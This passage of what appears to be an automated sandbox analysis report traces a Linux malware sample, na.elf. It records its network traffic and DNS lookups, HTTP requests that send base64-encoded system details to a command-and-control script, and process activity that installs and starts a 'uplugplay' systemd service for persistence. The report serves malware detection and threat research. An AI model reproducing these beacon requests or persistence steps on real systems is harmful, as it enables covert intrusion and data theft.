Mar 25, 2025 21:20:35.092749119 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.092799902 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.135366917 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.163222075 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.180985928 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.181030989 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.181140900 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.190665007 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.190705061 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.190785885 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.231905937 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.275590897 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.275635004 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.275654078 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.318960905 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.319010973 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.319057941 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.329680920 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.329757929 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.348356962 CET	34314	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:35.372586966 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.372633934 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.372708082 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.417207956 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.417277098 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.417342901 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.461514950 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.461581945 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.461632967 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.463699102 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.477994919 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.478037119 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.478213072 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.493253946 CET	80	34314	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:35.493417978 CET	34314	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:35.495949984 CET	34314	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:35.512923956 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.512991905 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.512994051 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.563410044 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.593472004 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.593513012 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.594520092 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.609699011 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.609738111 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.609761953 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.610105991 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.612828970 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.612871885 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.612977982 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.613078117 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.659684896 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.659729958 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.660319090 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.688214064 CET	80	34314	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:35.692327023 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.692370892 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.692528009 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.712178946 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.730866909 CET	80	34314	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:35.730993986 CET	34314	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:35.749725103 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.749792099 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.749846935 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.749891996 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.754717112 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.758845091 CET	34314	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:35.854734898 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.854762077 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:35.854986906 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:35.907921076 CET	80	34314	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:36.302397966 CET	80	34314	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:36.302510023 CET	34314	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:37.527241945 CET	34316	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:37.672622919 CET	80	34316	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:37.672739029 CET	34316	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:37.675817966 CET	34316	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:37.867400885 CET	80	34316	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:37.950778008 CET	80	34316	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:37.950927019 CET	34316	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:37.955183983 CET	80	34316	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:37.973347902 CET	34316	80	192.168.2.13	152.36.128.18
Mar 25, 2025 21:20:38.125968933 CET	80	34316	152.36.128.18	192.168.2.13
Mar 25, 2025 21:20:40.811847925 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:40.811847925 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:40.941379070 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:40.941412926 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:40.941431046 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:40.941473961 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:40.941509008 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:40.941509008 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:51.551203012 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:51.551259041 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:51.551372051 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:51.552742004 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:51.552759886 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.081222057 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.081465006 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.081672907 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.081697941 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.083982944 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.084095001 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.084831953 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.084937096 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.085000038 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.085024118 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.085095882 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.532424927 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.532687902 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.532818079 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.532902002 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:20:59.532958031 CET	443	50542	34.243.160.129	192.168.2.13
Mar 25, 2025 21:20:59.532996893 CET	50542	443	192.168.2.13	34.243.160.129
Mar 25, 2025 21:22:39.670906067 CET	60504	80	192.168.2.13	54.170.242.139
Mar 25, 2025 21:22:39.913119078 CET	80	60504	54.170.242.139	192.168.2.13
Mar 25, 2025 21:22:39.913392067 CET	60504	80	192.168.2.13	54.170.242.139
Mar 25, 2025 21:22:39.915339947 CET	60504	80	192.168.2.13	54.170.242.139
Mar 25, 2025 21:22:40.158413887 CET	80	60504	54.170.242.139	192.168.2.13
Mar 25, 2025 21:22:40.158473015 CET	80	60504	54.170.242.139	192.168.2.13
Mar 25, 2025 21:22:40.158498049 CET	80	60504	54.170.242.139	192.168.2.13
Mar 25, 2025 21:22:40.158987045 CET	60504	80	192.168.2.13	54.170.242.139
Mar 25, 2025 21:22:40.161758900 CET	60504	80	192.168.2.13	54.170.242.139
Mar 25, 2025 21:22:40.419965029 CET	80	60504	54.170.242.139	192.168.2.13

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 21:22:39.352832079 CET	35046	53	192.168.2.13	8.8.8.8
Mar 25, 2025 21:22:39.459173918 CET	53	35046	8.8.8.8	192.168.2.13
Mar 25, 2025 21:22:39.460767984 CET	60773	53	192.168.2.13	8.8.8.8
Mar 25, 2025 21:22:39.566534996 CET	53	60773	8.8.8.8	192.168.2.13
Mar 25, 2025 21:22:39.569107056 CET	40957	53	192.168.2.13	8.8.8.8
Mar 25, 2025 21:22:39.669584036 CET	53	40957	8.8.8.8	192.168.2.13
Mar 25, 2025 21:22:40.162981987 CET	46846	53	192.168.2.13	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 25, 2025 21:22:39.352832079 CET	192.168.2.13	8.8.8.8	0x1551	Standard query (0)	xinchaocfcfda.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 21:22:39.460767984 CET	192.168.2.13	8.8.8.8	0x1551	Standard query (0)	xinchaocfcfda.net	A (IP address)	IN (0x0001)	false
Mar 25, 2025 21:22:39.569107056 CET	192.168.2.13	8.8.8.8	0x1551	Standard query (0)	xinchaocfcfda.net	A (IP address)	IN (0x0001)	false
Mar 25, 2025 21:22:40.162981987 CET	192.168.2.13	8.8.8.8	0x1551	Standard query (0)	xincfcfda.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 25, 2025 21:22:39.459173918 CET	8.8.8.8	192.168.2.13	0x1551	Name error (3)	xinchaocfcfda.com	none	none	A (IP address)	IN (0x0001)	false
Mar 25, 2025 21:22:39.566534996 CET	8.8.8.8	192.168.2.13	0x1551	No error (0)	xinchaocfcfda.net		54.170.242.139	A (IP address)	IN (0x0001)	false
Mar 25, 2025 21:22:39.669584036 CET	8.8.8.8	192.168.2.13	0x1551	No error (0)	xinchaocfcfda.net		54.170.242.139	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

motd.ubuntu.com

152.36.128.18

xinchaocfcfda.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.13	34314	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 21:20:35.495949984 CET	76	OUT	GET /cgi-bin/p.cgi?r=23&i=97A85012XX91KDE3 HTTP/1.0 Host: 152.36.128.18
Mar 25, 2025 21:20:35.730866909 CET	217	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:20:35 GMT Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6 Content-Length: 7 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 73 79 73 69 6e 66 6f Data Ascii: sysinfo

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.13	34316	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 21:20:37.675817966 CET	751	OUT	GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDE1OjIwOjM2IHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjkxLCAxLjI1LCAwLjQ3fDE3NDI5MzQwMzYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=97A85012XX91KDE3&h=galassia&enckey=SvY5g6wZpBYLQgI8A8T2weHPQGJdj4JlHIpxiOcYrqb3S/H+UhZO7mowCy2Dzftt4L5GaXMixpFcmFxnztbLiX9LTKfVBYHj8tdw8zdeIP+mMMR89wfCv8f97M3U94r5T/9WWmgabhbtaXfn3qVY/YYIuZfuxVzbkteS2nVxDwc= HTTP/1.0 Host: 152.36.128.18
Mar 25, 2025 21:20:37.950778008 CET	262	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:20:37 GMT Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6 Content-Length: 3 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a Data Ascii: ok!Content-type: text/html; charset=windows-1251

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.13	60504	54.170.242.139	80

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 21:22:39.915339947 CET	281	OUT	GET /cgi-bin/p.cgi?r=0&auth=hash&i=97A85012XX91KDE3&enckey=SvY5g6wZpBYLQgI8A8T2weHPQGJdj4JlHIpxiOcYrqb3S/H-UhZO7mowCy2Dzftt4L5GaXMixpFcmFxnztbLiX9LTKfVBYHj8tdw8zdeIP-mMMR89wfCv8f97M3U94r5T/9WWmgabhbtaXfn3qVY/YYIuZfuxVzbkteS2nVxDwc_ HTTP/1.0 Host: xinchaocfcfda.net
Mar 25, 2025 21:22:40.158473015 CET	396	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 25 Mar 2025 20:22:40 GMT Content-Type: text/html Connection: close Set-Cookie: btst=55cebbb37439e43ec0f93c4f011d589a\|161.77.13.20\|1742934160\|1742934160\|0\|1\|0; path=/; domain=.xinchaocfcfda.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=161.77.13.20; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.13	50542	34.243.160.129	443

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:20:59 UTC	249	OUT	GET / HTTP/1.1 User-Agent: wget/1.20.3-1ubuntu1 Ubuntu/20.04.2/LTS GNU/Linux/5.4.0-72-generic/x86_64 Intel(R)/Xeon(R)/Silver/4210/CPU/@/2.20GHz cloud_id/none Accept: / Accept-Encoding: identity Host: motd.ubuntu.com Connection: Keep-Alive
2025-03-25 20:20:59 UTC	271	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:20:59 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Tue, 25 Mar 2025 20:15:29 GMT ETag: "d8-6313061c94f8e" Accept-Ranges: bytes Content-Length: 216 Vary: Accept-Encoding Connection: close Content-Type: text/plain
2025-03-25 20:20:59 UTC	216	IN	Data Raw: 20 2a 20 53 74 72 69 63 74 6c 79 20 63 6f 6e 66 69 6e 65 64 20 4b 75 62 65 72 6e 65 74 65 73 20 6d 61 6b 65 73 20 65 64 67 65 20 61 6e 64 20 49 6f 54 20 73 65 63 75 72 65 2e 20 4c 65 61 72 6e 20 68 6f 77 20 4d 69 63 72 6f 4b 38 73 0a 20 20 20 6a 75 73 74 20 72 61 69 73 65 64 20 74 68 65 20 62 61 72 20 66 6f 72 20 65 61 73 79 2c 20 72 65 73 69 6c 69 65 6e 74 20 61 6e 64 20 73 65 63 75 72 65 20 4b 38 73 20 63 6c 75 73 74 65 72 20 64 65 70 6c 6f 79 6d 65 6e 74 2e 0a 0a 20 20 20 68 74 74 70 73 3a 2f 2f 75 62 75 6e 74 75 2e 63 6f 6d 2f 65 6e 67 61 67 65 2f 73 65 63 75 72 65 2d 6b 75 62 65 72 6e 65 74 65 73 2d 61 74 2d 74 68 65 2d 65 64 67 65 0a Data Ascii: * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment. https://ubuntu.com/engage/secure-kubernetes-at-the-edge

System Behavior

Analysis Process: na.elf PID: 5399, Parent PID: 5323

General

Start time (UTC):	20:20:21
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

File Activities

File Opened

File Deleted

File Read

File Written

Permission Modified

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: na.elf PID: 5402, Parent PID: 5399

General

Start time (UTC):	20:20:21
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5402, Parent PID: 5399

General

Start time (UTC):	20:20:21
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep na.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5403, Parent PID: 5402

General

Start time (UTC):	20:20:21
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 5403, Parent PID: 5402

General

Start time (UTC):	20:20:21
Start date (UTC):	25/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep na.elf
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5408, Parent PID: 5399

General

Start time (UTC):	20:20:22
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5408, Parent PID: 5399

General

Start time (UTC):	20:20:22
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep uplugplay"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5409, Parent PID: 5408

General

Start time (UTC):	20:20:22
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 5409, Parent PID: 5408

General

Start time (UTC):	20:20:22
Start date (UTC):	25/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep uplugplay
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5412, Parent PID: 5399

General

Start time (UTC):	20:20:24
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5412, Parent PID: 5399

General

Start time (UTC):	20:20:24
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof uplugplay"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5413, Parent PID: 5412

General

Start time (UTC):	20:20:24
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 5413, Parent PID: 5412

General

Start time (UTC):	20:20:24
Start date (UTC):	25/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof uplugplay
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5416, Parent PID: 5399

General

Start time (UTC):	20:20:26
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5416, Parent PID: 5399

General

Start time (UTC):	20:20:26
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5417, Parent PID: 5416

General

Start time (UTC):	20:20:26
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 5417, Parent PID: 5416

General

Start time (UTC):	20:20:26
Start date (UTC):	25/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep upnpsetup
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5422, Parent PID: 5399

General

Start time (UTC):	20:20:27
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5422, Parent PID: 5399

General

Start time (UTC):	20:20:27
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5423, Parent PID: 5422

General

Start time (UTC):	20:20:28
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 5423, Parent PID: 5422

General

Start time (UTC):	20:20:28
Start date (UTC):	25/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof upnpsetup
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5430, Parent PID: 5399

General

Start time (UTC):	20:20:31
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5430, Parent PID: 5399

General

Start time (UTC):	20:20:31
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl daemon-reload"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5431, Parent PID: 5430

General

Start time (UTC):	20:20:31
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 5431, Parent PID: 5430

General

Start time (UTC):	20:20:31
Start date (UTC):	25/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 5435, Parent PID: 5399

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5435, Parent PID: 5399

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl enable uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5436, Parent PID: 5435

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 5436, Parent PID: 5435

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 5442, Parent PID: 5399

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5442, Parent PID: 5399

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl start uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5443, Parent PID: 5442

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 5443, Parent PID: 5442

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl start uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: systemd PID: 5433, Parent PID: 5432

General

Start time (UTC):	20:20:31
Start date (UTC):	25/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
